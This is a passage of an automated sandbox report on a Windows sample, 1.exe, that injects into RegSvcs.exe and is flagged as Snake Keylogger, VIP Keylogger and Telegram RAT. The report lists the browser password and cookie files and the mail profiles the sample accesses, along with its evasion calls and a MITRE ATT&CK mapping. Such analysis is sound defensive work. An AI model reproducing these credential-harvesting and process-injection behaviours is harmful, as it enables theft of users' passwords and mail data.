                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ef22b264489d8b
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fbc4f21be05b27<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f712acc9a62b48<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8feba111b94b28a<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f7e0be0674c8b3<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8efdae4bf20e674
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f5d05612c10071<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f14f701bfcdd04
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ff79de852aef3c<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f09625e9a32898
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fabef1428a4534<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fccbafe45d97dd<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f0e844ff56e061
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000023BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8eb68e14b487c54
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f91ff279dd8d0f<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ec375578b40b51
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ee64085eb4bc03
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f3e59b2d07c3de<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f87fdccaba9215<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ed9a1c3a16fd0e
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f5490925d8525e<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f33a64763ff211
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f25279886305f6
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f4a88838ff3edb<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fde56e40640dd0<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ec8d2668f338fa
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f678da0a83e01a<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f1b86f49c90312
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------90008829327ad14<
                    Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fa1b86304e06bd<
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f2cf5bd6c5a375
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8eb012f83fd6770
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8ecfbdf275eedab
                    Source: C:\Users\user\Desktop\1.exeAPI call chain: ExitProcess graph end nodegraph_0-34770
                    Source: C:\Users\user\Desktop\1.exeAPI call chain: ExitProcess graph end nodegraph_0-35628
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00A934B0 mov eax, dword ptr fs:[00000030h]0_2_00A934B0
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00A93510 mov eax, dword ptr fs:[00000030h]0_2_00A93510
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00A91E70 mov eax, dword ptr fs:[00000030h]0_2_00A91E70
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\1.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3F3008Jump to behavior
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004378B5 SendInput,keybd_event,0_2_004378B5
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044BA58 mouse_event,mouse_event,mouse_event,0_2_0044BA58
                    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\1.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002974000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: RegSvcs.exe, 00000001.00000002.3808692532.0000000002974000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 1.exeBinary or memory string: Shell_TrayWnd
                    Source: 1.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00435A35 GetLocalTime,_wcslen,_wcsncpy,_wcslen,_wcsncpy,_wcslen,_wcsncpy,_wcslen,_wcslen,_wcsncpy,_wcslen,_wcsncpy,_wcslen,_wcsncpy,0_2_00435A35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: 1.exe, 00000000.00000003.1346877436.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1356533462.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1345952384.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1346142934.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1346249060.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1346803941.0000000003A0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000001.00000002.3808692532.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.3808692532.000000000242E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		3
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		2
                    File and Directory Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager114
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS131
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		2
                    Valid Accounts                    		LSA Secrets11
                    Virtualization/Sandbox Evasion                    		SSH3
                    Clipboard Data                    		15
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials2
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation                    		DCSync11
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.